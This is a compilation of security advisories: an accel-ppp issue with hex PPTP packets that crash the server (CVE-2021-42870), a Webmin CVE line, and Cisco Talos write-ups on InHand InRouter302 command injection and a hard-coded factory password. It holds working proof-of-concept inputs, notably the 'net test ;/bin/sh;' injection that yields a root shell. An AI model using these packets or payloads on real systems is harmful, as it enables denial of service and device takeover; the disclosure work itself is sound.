ACCEL-PPP 1.12.0 has an out-of-bounds read in post_msg when processing a call_clear_request.

Using version accel-ppp version 1.12.0-149-gff91c73.

**Summary**

Sending PPTP Call Clear Request Packet after PPTP Start Control Connection Request and PPTP Outgoing Call Request to server can cause stack-buffer-underflow.

**PoC**

Here is the detailed information of sent packets:

*   Packet 1

    hexstream:
    009c00011a2b3c4d00010000010000000000000300000003ffff00016c6f63616c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063616e616e69616e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    
    packet structure:
    ###[ PPTP Start Control Connection Request ]### 
      len       = 156
      type      = Control Message
      magic_cookie= 0x1a2b3c4d
      ctrl_msg_type= Start-Control-Connection-Request
      reserved_0= 0x0
      protocol_version= 256
      reserved_1= 0x0
      framing_capabilities= Asynchronous Framing supported+Synchronous Framing supported
      bearer_capabilities= Analog access supported+Digital access supported
      maximum_channels= 65535
      firmware_revision= 1
      host_name = 'local'
      vendor_string= 'cananian'
    

*   Packet 2

    hexstream:
    00a800011a2b3c4d00070000e60c00000000096000989680000000030000000300030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    
    packet structure:
    ###[ PPTP Outgoing Call Request ]### 
      len       = 168
      type      = Control Message
      magic_cookie= 0x1a2b3c4d
      ctrl_msg_type= Outgoing-Call-Request
      reserved_0= 0x0
      call_id   = 58892
      call_serial_number= 0
      minimum_bps= 2400
      maximum_bps= 10000000
      bearer_type= Any type of channel
      framing_type= Any type of framing
      pkt_window_size= 3
      pkt_proc_delay= 0
      phone_number_len= 0
      reserved_1= 0x0
      phone_number= ''
      subaddress= ''
    

*   Packet 3

    hexstream:
    001000011a2b3c4d000c0000e60c0000
    
    packet structure:
    ###[ PPTP Call Clear Request ]### 
      len       = 16
      type      = Control Message
      magic_cookie= 0x1a2b3c4d
      ctrl_msg_type= Call-Clear-Request
      reserved_0= 0x0
      call_id   = 58892
      reserved_1= 0x0
    

**Hint: the call_id field is randomly generated thus directly forwarding those three packets might not reproduce the scene. To reproduce it, it's neccessary to construct similar packets.**

**Crash report**

log of server:

    [2021-10-18 13:23:01.445] accel-ppp version 1.12.0-149-gff91c73
    [2021-10-18 13:23:01.477] pptp: iprange module disabled, improper IP configuration of PPP interfaces may cause kernel soft lockup
    [2021-10-18 13:23:01.479] l2tp: iprange module disabled, improper IP configuration of PPP interfaces may cause kernel soft lockup
    [2021-10-18 13:23:01.516] pptp: new connection from 127.0.0.1
    [2021-10-18 13:23:01.517] : : recv [PPTP Start-Ctrl-Conn-Request <Version 1> <Framing 3> <Bearer 3> <Max-Chan 65535>]
    [2021-10-18 13:23:01.517] : : send [PPTP Start-Ctrl-Conn-Reply <Version 1> <Result 1> <Error 0> <Framing 3> <Bearer 3> <Max-Chan 1>]
    [2021-10-18 13:23:02.516] : : recv [PPTP Outgoing-Call-Request <Call-ID e60c> <Call-Serial 0> <Min-BPS 2400> <Max-BPS 10000000> <Bearer 3> <Framing 3> <Window-Size 3> <Delay 0>]
    [2021-10-18 13:23:02.517] : : send [PPTP Outgoing-Call-Reply <Call-ID 615> <Peer-Call-ID e60c> <Result 1> <Error 0> <Cause 0> <Speed 10000000> <Window-Size 3> <Delay 0> <Channel 0>]
    [2021-10-18 13:23:02.517] : : lcp_layer_init
    [2021-10-18 13:23:02.517] : : auth_layer_init
    [2021-10-18 13:23:02.517] : : ccp_layer_init
    [2021-10-18 13:23:02.517] : : ipcp_layer_init
    [2021-10-18 13:23:02.517] : : ipv6cp_layer_init
    [2021-10-18 13:23:02.517] : : ppp establishing
    [2021-10-18 13:23:02.518] : 78a9b1ca73684d70: lcp_layer_start
    [2021-10-18 13:23:02.518] : 78a9b1ca73684d70: send [LCP ConfReq id=71 <auth MSCHAP-v2> <mru 1400> <magic 465aee3b>]
    [2021-10-18 13:23:03.495] terminate, sig = 15
    [2021-10-18 13:23:03.495] : 78a9b1ca73684d70: terminate
    [2021-10-18 13:23:03.495] : 78a9b1ca73684d70: lcp_layer_finish
    [2021-10-18 13:23:03.496] : 78a9b1ca73684d70: pptp: ppp finished
    [2021-10-18 13:23:03.496] : 78a9b1ca73684d70: send [PPTP Call-Disconnect-Notify <Call-ID ce6> <Result 3> <Error 0> <Cause 0>]
    [2021-10-18 13:23:03.496] : 78a9b1ca73684d70: send [PPTP Stop-Ctrl-Conn-Request <Reason 0>]
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: lcp_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: auth_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: ccp_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: ipcp_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: ipv6cp_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: recv [PPTP Call-Clear-Request <Call-ID e60c>]
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: send [PPTP Call-Disconnect-Notify <Call-ID ce6> <Result 4> <Error 0> <Cause 0>]
    

Here is the asan report:

    ==2434668==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7f785e8afe1f at pc 0x000000499d97 bp 0x7f7862ed07c0 sp 0x7f7862ecff88
    READ of size 149 at 0x7f785e8afe1f thread T7
        #0 0x499d96 in __asan_memcpy /home/brian/src/llvm_releases/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
        #1 0x7f786b3e5d1f in post_msg /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:150:3
        #2 0x7f786b3e6a19 in send_pptp_call_disconnect_notify /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:385:9
        #3 0x7f786b3e13bd in pptp_call_clear_rqst /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:404:9
        #4 0x7f786b3e13bd in process_packet /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:478:11
        #5 0x7f786b3e13bd in pptp_read /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:527:9
        #6 0x7f78714c81c1 in ctx_thread /root/projects/accel-ppp/accel-pppd/triton/triton.c:252:10
        #7 0x7f78714c81c1 in triton_thread /root/projects/accel-ppp/accel-pppd/triton/triton.c:192:5
        #8 0x7f7871485608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477:8
        #9 0x7f7870e5e292 in clone /build/glibc-eX1tMB/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
    
    Address 0x7f785e8afe1f is located in stack of thread T7 at offset 31 in frame
        #0 0x7f786b3e666f in send_pptp_call_disconnect_notify /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:373
    
      This frame has 1 object(s):
        [32, 180) 'msg' (line 374) <== Memory access at offset 31 partially underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    Thread T7 created by T0 here:
        #0 0x484d4c in pthread_create /home/brian/src/llvm_releases/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:205:3
        #1 0x7f78714c6eee in create_thread /root/projects/accel-ppp/accel-pppd/triton/triton.c:320:9
        #2 0x7f78714cdc17 in triton_run /root/projects/accel-ppp/accel-pppd/triton/triton.c:744:7
        #3 0x559603 in main /root/projects/accel-ppp/accel-pppd/main.c:415:2
        #4 0x7f7870d630b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: stack-buffer-underflow /home/brian/src/llvm_releases/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 in __asan_memcpy
    Shadow bytes around the buggy address:
      0x0fef8bd0df70: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0df80: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0df90: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0dfa0: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0dfb0: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
    =>0x0fef8bd0dfc0: f1 f1 f1[f1]00 00 00 00 00 00 00 00 00 00 00 00
      0x0fef8bd0dfd0: 00 00 00 00 00 00 04 f3 f3 f3 f3 f3 f3 f3 f3 f3
      0x0fef8bd0dfe0: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0dff0: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0e000: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0e010: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2434668==ABORTING
    

**Reproduce info**

Build access-ppp:

mkdir build && cd build
cmake -DCMAKE\_C\_COMPILER=clang -DCMAKE\_CXX\_COMPILER=clang++ -DCMAKE\_C\_FLAGS="\-fsanitize=address -g" -DCMAKE\_CXX\_FLAGS="\-fsanitize=address -g" -DBUILD\_DRIVER=false -DCMAKE\_INSTALL\_PREFIX=/usr/local -DCMAKE\_BUILD\_TYPE=Debug -DLOG\_PGSQL=TRUE -DSHAPER=TRUE -DRADIUS=TRUE -DNETSNMP=TRUE ..
CC=clang CXX=clang++ CFLAGS="\-fsanitize=address -g" CXXFLAGS="\-fsanitize=address -g" make -j
make install

Run access-pppd, use the following command:

accel-pppd -c /etc/accel-ppp.conf

The running configuration /etc/accel-ppp.conf is:

    [modules]
     log_file
     #log_syslog
     #log_tcp
     #log_pgsql
     
     pptp
     l2tp
     #sstp
     #pppoe
     #ipoe
     
     auth_mschap_v2
     auth_mschap_v1
     auth_chap_md5
     auth_pap
     
     #radius
     chap-secrets
     
     ippool
     
     pppd_compat
     
     #shaper
     #net-snmp
     #logwtmp
     #connlimit
     
     #ipv6_nd
     #ipv6_dhcp
     #ipv6pool
     
     [core]
     log-error=/var/log/accel-ppp/core.log
     thread-count=4
     
     [common]
     #single-session=replace
     #single-session-ignore-case=0
     #sid-case=upper
     #sid-source=seq
     #max-sessions=1000
     #max-starting=0
     #check-ip=0
     
     [ppp]
     verbose=1
     min-mtu=1280
     mtu=1400
     mru=1400
     #accomp=deny
     #pcomp=deny
     #ccp=0
     #mppe=require
     ipv4=require
     ipv6=deny
     ipv6-intf-id=0:0:0:1
     ipv6-peer-intf-id=0:0:0:2
     ipv6-accept-peer-intf-id=1
     lcp-echo-interval=20
     #lcp-echo-failure=3
     lcp-echo-timeout=120
     unit-cache=1
     #unit-preallocate=1
     
     [auth]
     #any-login=0
     #noauth=0
     
     [pptp]
     verbose=1
     #echo-interval=30
     ip-pool=pool1
     #ipv6-pool=pptp
     #ipv6-pool-delegate=pptp
     ifname=pptp%d
     #port=9300
     #mppe=prefer
     
     [pppoe]
     verbose=1
     #ac-name=xxx
     #service-name=yyy
     #pado-delay=0
     #pado-delay=0,100:100,200:200,-1:500
     called-sid=mac
     #tr101=1
     #padi-limit=0
     #ip-pool=pppoe
     #ipv6-pool=pppoe
     #ipv6-pool-delegate=pppoe
     #ifname=pppoe%d
     #sid-uppercase=0
     #vlan-mon=eth0,10-200
     #vlan-timeout=60
     #vlan-name=%I.%N
     #interface=eth1,padi-limit=1000
     interface=ens18
     
     [l2tp]
     verbose=1
     #dictionary=/usr/local/share/accel-ppp/l2tp/dictionary
     #hello-interval=60
     #timeout=60
     #rtimeout=1
     #rtimeout-cap=16
     #retransmit=5
     #recv-window=16
     #host-name=accel-ppp
     #dir300_quirk=0
     #secret=
     #dataseq=allow
     #reorder-timeout=0
     #ip-pool=l2tp
     #ipv6-pool=l2tp
     #ipv6-pool-delegate=l2tp
     #ifname=l2tp%d
     
     [sstp]
     verbose=1
     #cert-hash-proto=sha1,sha256
     #cert-hash-sha1=
     #cert-hash-sha256=
     #accept=ssl,proxy
     #ssl-protocol=tls1,tls1.1,tls1.2,tls1.3
     #ssl-dhparam=/etc/ssl/dhparam.pem
     #ssl-ecdh-curve=prime256v1
     #ssl-ciphers=DEFAULT
     #ssl-prefer-server-ciphers=0
     #ssl-ca-file=/etc/ssl/sstp-ca.crt
     #ssl-pemfile=/etc/ssl/sstp-cert.pem
     #ssl-keyfile=/etc/ssl/sstp-key.pem
     #host-name=domain.tld
     #http-error=allow
     #timeout=60
     #hello-interval=60
     #ip-pool=sstp
     #ipv6-pool=sstp
     #ipv6-pool-delegate=sstp
     #ifname=sstp%d
     
     [ipoe]
     verbose=1
     username=ifname
     #password=username
     lease-time=600
     #renew-time=300
     #rebind-time=525
     max-lease-time=3600
     #unit-cache=1000
     #l4-redirect-table=4
     #l4-redirect-ipset=l4
     #l4-redirect-on-reject=300
     #l4-redirect-ip-pool=pool1
     shared=0
     ifcfg=1
     mode=L2
     start=dhcpv4
     #start=up
     #ip-unnumbered=1
     #proxy-arp=0
     #nat=0
     #proto=100
     #relay=10.10.10.10
     #vendor=Custom
     #weight=0
     #attr-dhcp-client-ip=DHCP-Client-IP-Address
     #attr-dhcp-router-ip=DHCP-Router-IP-Address
     #attr-dhcp-mask=DHCP-Mask
     #attr-dhcp-lease-time=DHCP-Lease-Time
     #attr-dhcp-renew-time=DHCP-Renewal-Time
     #attr-dhcp-rebind-time=DHCP-Rebinding-Time
     #attr-dhcp-opt82=DHCP-Option82
     #attr-dhcp-opt82-remote-id=DHCP-Agent-Remote-Id
     #attr-dhcp-opt82-circuit-id=DHCP-Agent-Circuit-Id
     #attr-l4-redirect=L4-Redirect
     #attr-l4-redirect-table=4
     #attr-l4-redirect-ipset=l4-redirect
     #lua-file=/etc/accel-ppp.lua
     #offer-delay=0,100:100,200:200,-1:1000
     #vlan-mon=eth0,10-200
     #vlan-timeout=60
     #vlan-name=%I.%N
     #ip-pool=ipoe
     #ipv6-pool=ipoe
     #ipv6-pool-delegate=ipoe
     #idle-timeout=0
     #session-timeout=0
     #soft-terminate=0
     #check-mac-change=1
     #calling-sid=mac
     #local-net=192.168.0.0/16
     interface=eth0
     
     [dns]
     #dns1=172.16.0.1
     #dns2=172.16.1.1
     
     [wins]
     #wins1=172.16.0.1
     #wins2=172.16.1.1
     
     [radius]
     #dictionary=/usr/local/share/accel-ppp/radius/dictionary
     nas-identifier=accel-ppp
     nas-ip-address=127.0.0.1
     gw-ip-address=192.168.100.1
     server=127.0.0.1,testing123,auth-port=1812,acct-port=1813,req-limit=50,fail-timeout=0,max-fail=10,weight=1
     dae-server=127.0.0.1:3799,testing123
     verbose=1
     #timeout=3
     #max-try=3
     #acct-timeout=120
     #acct-delay-time=0
     #acct-on=0
     #acct-interim-interval=0
     #acct-interim-jitter=0
     #default-realm=
     #strip-realm=0
     #attr-tunnel-type=My-Tunnel-Type
     
     [client-ip-range]
     0.0.0.0/0
     
     [ip-pool]
     gw-ip-address=192.168.0.1
     #vendor=Cisco
     #attr=Cisco-AVPair
     attr=Framed-Pool
     192.168.0.2-255
     192.168.1.1-255,name=pool1
     192.168.2.1-255,name=pool2
     192.168.3.1-255,name=pool3
     192.168.4.1-255,name=pool4,next=pool1
     192.168.4.0/24
     
     [log]
     log-file=/var/log/accel-ppp/accel-ppp.log
     log-emerg=/var/log/accel-ppp/emerg.log
     log-fail-file=/var/log/accel-ppp/auth-fail.log
     log-debug=/dev/stdout
     syslog=accel-pppd,daemon
     #log-tcp=127.0.0.1:3000
     copy=1
     color=1
     #per-user-dir=per_user
     #per-session-dir=per_session
     #per-session=1
     level=5
     
     [log-pgsql]
     conninfo=user=log
     log-table=log
     
     [pppd-compat]
     verbose=1
     #ip-pre-up=/etc/ppp/ip-pre-up
     ip-up=/etc/ppp/ip-up
     ip-down=/etc/ppp/ip-down
     #ip-change=/etc/ppp/ip-change
     radattr-prefix=/var/run/radattr
     #fork-limit=16
     
     [chap-secrets]
     gw-ip-address=192.168.100.1
     chap-secrets=/etc/ppp/chap-secrets.ppp
     #encrypted=0
     #username-hash=md5
     
     [shaper]
     #attr=Filter-Id
     #down-burst-factor=0.1
     #up-burst-factor=1.0
     #latency=50
     #mpu=0
     #mtu=0
     #r2q=10
     #quantum=1500
     #moderate-quantum=1
     #cburst=1534
     #ifb=ifb0
     up-limiter=police
     down-limiter=tbf
     #leaf-qdisc=sfq perturb 10
     #leaf-qdisc=fq_codel [limit PACKETS] [flows NUMBER] [target TIME] [interval TIME] [quantum BYTES] [[no]ecn]
     #rate-multiplier=1
     #fwmark=1
     #rate-limit=2048/1024
     verbose=1
     
     [cli]
     verbose=1
     telnet=127.0.0.1:2000
     tcp=127.0.0.1:2001
     #password=123
     #sessions-columns=ifname,username,ip,ip6,ip6-dp,type,state,uptime,uptime-raw,calling-sid,called-sid,sid,comp,rx-bytes,tx-bytes,rx-bytes-raw,tx-bytes-raw,rx-pkts,tx-pkts
     
     [snmp]
     master=0
     agent-name=accel-ppp
     
     [connlimit]
     limit=10/min
     burst=3
     timeout=60
     
     [ipv6-pool]
     #gw-ip6-address=fc00:0:1::1
     #vendor=
     #attr-prefix=Delegated-IPv6-Prefix-Pool
     #attr-address=Stateful-IPv6-Address-Pool
     fc00:0:1::/48,64
     fc00:0:2::/48,64,name=pool1
     fc00:0:3::/48,64,name=pool2,next=pool1
     delegate=fc00:1::/36,48
     delegate=fc00:2::/36,48,name=pool3
     delegate=fc00:3::/36,48,name=pool4,next=pool3
     
     [ipv6-dns]
     #fc00:1::1
     #fc00:1::2
     #fc00:1::3
     #dnssl=suffix1.local.net
     #dnssl=suffix2.local.net.
     
     [ipv6-dhcp]
     verbose=1
     pref-lifetime=604800
     valid-lifetime=2592000
     route-via-gw=1
    

use chap-secrets and the /etc/ppp/chap-secrets.ppp is as follows:

    # Secrets for authentication using CHAP
    # client	server	secret			IP addresses
    fouzhe * 123 *

CVE-2021-42870: Abnormal packet sequence can cause stack-buffer-underflow · Issue #158 · xebd/accel-ppp

Webmin through 1.991, when the Authentic theme is used, allows remote code execution when a user has been manually created (i.e., not created in Virtualmin or Cloudmin). This occurs because settings-editor_write.cgi does not properly restrict the file parameter.

CVE-2022-30708: Webmin

An OS command injection vulnerability exists in the console infactory_net functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An OS command injection vulnerability exists in the console infactory\_net functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

InHand Networks InRouter302 V3.5.37

**Product URLs**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 Score**

9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**Details**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanism, such as: VPN technologies, firewall functionalities, authorization management and several other features.

The InRouter302 offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console.

Here is the prompt after the login:

    ************************************************
            Welcome to Router console
        Inhand
        Copyright @2001-2020, Beijing InHand Networks Co., Ltd.
        http://www.inhandnetworks.com
    ------------------------------------------------
    Model                : IR302-WLAN
    Serial Number        : RF3022141057203
    Description          : www.inhandnetworks.com
    Current Version      : V3.5.37
    Current Bootloader Version : 1.1.3.r4955
    ------------------------------------------------
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
    help           -- get help for commands
    language       -- Set language
    show           -- show system information
    exit           -- exit current mode/console
    ping           -- ping test
    comredirect    -- COM redirector
    telnet         -- telnet to a host
    traceroute     -- trace route to a host
    enable         -- turn on privileged commands
    infactory      -- factory mode
    Router>
    

The infactory command permits, provided the correct password, the access to the factory mode view. This mode permits to change the configuration and perform various tests. The factory mode view:

    Router> infactory 
    input password: 
    Router(factory)# 
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
    help           -- get help for commands
    language       -- Set language
    exit           -- exit current mode/console
    reboot         -- reboot system
    factory-model  -- hardware model configure
    modem          -- modem test
    reset-key      -- check the status of the reset button
    com            -- detecting serial ports
    port           -- FCT network port test
    net            -- complete machine network port test
    led            -- LED lights test
    wlan           -- Wi-Fi test
    mem            -- check memory
    hw_wdg         -- check the hardware watchdog status
    dio            -- detect digital I/O
    stategridsec   -- detect stategrid security chip
    Router(factory)# 
    

This mode offers several functionalities. For instance, the net functionality allows to essentially execute a ping command specifying its interface parameter.

The net_functionality:

    undefined4 net_functionality(undefined4 param_1,int args)
    
    {
        [...]
        
        argument_list_ptr[0] = args;
        [...]
        if (argument_list_ptr[0] != 0) {
            first_arg = (char *)maybe_get_next_token(argument_list_ptr);
            if (*first_arg != '\0') {
                is_init = strncmp(first_arg,"init",4);
                if (is_init == 0) {
                    [...]
                }
                is_test = strncmp(first_arg,"test",4);
                if ((is_test == 0) &&
                    (interface = (char *)maybe_get_next_token(argument_list_ptr), 
                    interface != (char *)0x0)) {                                                            [1]
                    max_args = 3;
                    packets_count = 0;
                    timeout_ = 0;
                    target_ip = (char *)0x0;
                    [... here are parsed 3 optional parameters ...]
                    snprintf((char *)&ping_command,0x80,"ping -I %s -c %d -W %d %s",interface,packets_count,
                            timeout,target_ip);                                                             [2]
                    popen_stream = popen((char *)&ping_command,"r");                                        [3]
                    [...]
    }
    

If the first provided argument is test, then the second one, parsed at [1], will be later used at [2] to form the string ping -I <second_arg> -c <packets_count> -W <timeout> <target_ip>. This string will later be used at [3] as argument of the popen function.

The second argument is not properly sanitized, and a command injection can occur at [3]. An attacker, able to reach the net functionality, would be able to obtain a root shell.

**Exploit Proof of Concept**

Provided the command net test ;/bin/sh;, in the factory mode view, a root shell will be obtained:

    Router(factory)# net test ;/bin/sh;
    ping: option requires an argument -- I
    BusyBox v1.26.2 (2022-02-23 16:03:56 CST) multi-call binary.
    
    Usage: ping [OPTIONS] HOST
    help
    Built-in commands:
    ------------------
        . : [ [[ break cd chdir continue echo eval exec exit export false
        hash help history let local printf pwd read readonly return set
        shift source test times trap true type ulimit umask unset wait
    

**Vendor Response**

The vendor has updated their website and uploaded the latest firmware on it. https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4

https://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf

**Timeline**

2022-03-30 - Vendor Disclosure  
2022-05-10 - Public Release  
2022-05-10 - Vendor Patch Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-26518: TALOS-2022-1501 || Cisco Talos Intelligence Group

A hard-coded password vulnerability exists in the console infactory functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted network request can lead to privileged operation execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

A hard-coded password vulnerability exists in the console infactory functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted network request can lead to privileged operation execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

InHand Networks InRouter302 V3.5.37

**Product URLs**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 Score**

4.3 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

**CWE**

CWE-259 - Use of Hard-coded Password

**Details**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanism, such as: VPN technologies, firewall functionalities, authorization management and several other features.

The InRouter302 offers the telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console.

    ************************************************
               Welcome to Router console
          Inhand
          Copyright @2001-2020, Beijing InHand Networks Co., Ltd.
          http://www.inhandnetworks.com
    ------------------------------------------------
    Model                : IR302-WLAN
    Serial Number        : RF3022141057203
    Description          : www.inhandnetworks.com
    Current Version      : V3.5.37
    Current Bootloader Version : 1.1.3.r4955
    ------------------------------------------------
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
      help           -- get help for commands
      language       -- Set language
      show           -- show system information
      exit           -- exit current mode/console
      ping           -- ping test
      comredirect    -- COM redirector
      telnet         -- telnet to a host
      traceroute     -- trace route to a host
      enable         -- turn on privileged commands
      infactory      -- factory mode
    Router> 
    

A low-privileged user can login into this service. The Router console contains a command, called infactory. This functionality will request a password; if correct, a menu with several functions is accessed.

The infactory_command:

    undefined4 infactory_command(undefined4 param_1,char *provided_password)
    
    {
     [...]
    
      if ((provided_password == (char *)0x0) || (*provided_password == '\0')) {
        provided_password = password_in_stack;
        uVar2 = get_help_string("input_pass");
        get_pass_wrap(uVar2,provided_password,0x40);
      }
      aes_decrypt_str(<REDACTED>,0x40,decrypted_password,0x80);                                             [1]
      password_len = strlen(decrypted_password);
      iVar1 = strncmp(decrypted_password,provided_password,password_len);                                   [2]
      if (iVar1 == 0) {
        change_view(view_cursor,&view_infactory);                                                           [3]
        return 0;
      }
      [...]
    }
    

This function will first, at [1], decrypt a hard-coded hex encoded string. Then, if the comparison between the described string and the provided password, at [2], returns zero, meaning the two string are equal, then the code at [3] will be reached. Then the “view” will be changed, which means that the available commands will change.

The aes_decrypt_str:

    undefined4 aes_decrypt_str(char *data,uint data_len,char *output_buff)
    {
      [...]
      IV._0_4_ = 0;
      IV._4_4_ = 0;
      IV._8_4_ = 0;
      IV._12_4_ = 0;
      if ((data_len & 0x1f) == 0) {
        __size = (int)data_len / 2;
        data_bin = malloc(__size);
        if (data_bin == (void *)0x0) {
          syslog(3,"out of memory!");
          uVar1 = 0xffffffff;
        }
        else {
          str2bin(data,__size,data_bin);
          AES_set_key(AES_key,<REDACTED>,128);                                                              [4]
          uVar1 = IH_AES_cbc_encrypt(AES_key,data_bin,output_buff,__size,IV,0);
          free(data_bin);
        }
      }
      [...]
    }
    

The hard-coded data provided at [1] are decrypted, at [4], using AES with a hard-coded key. An attacker, in possession of low-privileged user credentials, would be able to access the infactory functionalities.

**Exploit Proof of Concept**

Using the infactory command and providing the correct password will list the infactory functionalities:

    Router> infactory
    input password: 
    Router(factory)# 
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
      help           -- get help for commands
      language       -- Set language
      exit           -- exit current mode/console
      reboot         -- reboot system
      factory-model  -- hardware model configure
      modem          -- modem test
      reset-key      -- check the status of the reset button
      com            -- detecting serial ports
      port           -- FCT network port test
      net            -- complete machine network port test
      led            -- LED lights test
      wlan           -- Wi-Fi test
      mem            -- check memory
      hw_wdg         -- check the hardware watchdog status
      dio            -- detect digital I/O
      stategridsec   -- detect stategrid security chip
    Router(factory)# 
    

**Vendor Response**

The vendor has updated their website and uploaded the latest firmware on it. https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4

https://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf

**Timeline**

2022-03-28 - Vendor Disclosure  
2022-05-10 - Public Release  
2022-05-10 - Vendor Patch Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-27172: TALOS-2022-1496 || Cisco Talos Intelligence Group

Francesco Benvenuto of Cisco Talos discovered these vulnerabilities. Blog by Francesco Benvenuto and Jon Munshaw. 
Cisco Talos recently discovered several vulnerabilities in InHand Networks’ InRouter302 that could allow an attacker to escalate their privileges on the targeted device from a...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities. Blog by Francesco Benvenuto and Jon Munshaw._ 

Cisco Talos recently discovered several vulnerabilities in InHand Networks’ InRouter302 that could allow an attacker to escalate their privileges on the targeted device from a non-privileged user to a privileged one. There are also multiple vulnerabilities that could allow an adversary to reach unconstrained root privileges. The router has one privileged user and several non-privileged ones. 

The InRouter is an industrial LTE router that includes remote management functionalities and several security protection mechanisms, such as VPN connections and a firewall. 

The router can be managed mainly in two ways: through the web interface, and through a router console accessible by telnet or, if enabled, SSH. The router does not provide access in any way to the Linux system beneath the router functionalities. 

The chart below, which includes only a subset of all the discovered vulnerabilities, shows the different paths an attacker could take to obtain root access after the user clicks on an attacker-controlled link. It would be possible to chain the vulnerabilities discovered in several ways to obtain root access on the device:

Cisco Talos worked with InHand Networks to ensure that this issue is resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.  

To avoid the exploitation of these vulnerabilities, users are encouraged to update InHand Networks InRouter302, version 3.5.4 and 3.5.37 to version 3.5.45. Note that most vulnerabilities exist in both versions, however, several vulnerabilities are unique to 3.5.37 due to newly introduced functionality. See below for details. Talos tested and confirmed these versions are affected by these vulnerabilities. For more information on each of these issues, read their full advisories, which are linked in the blog post below.

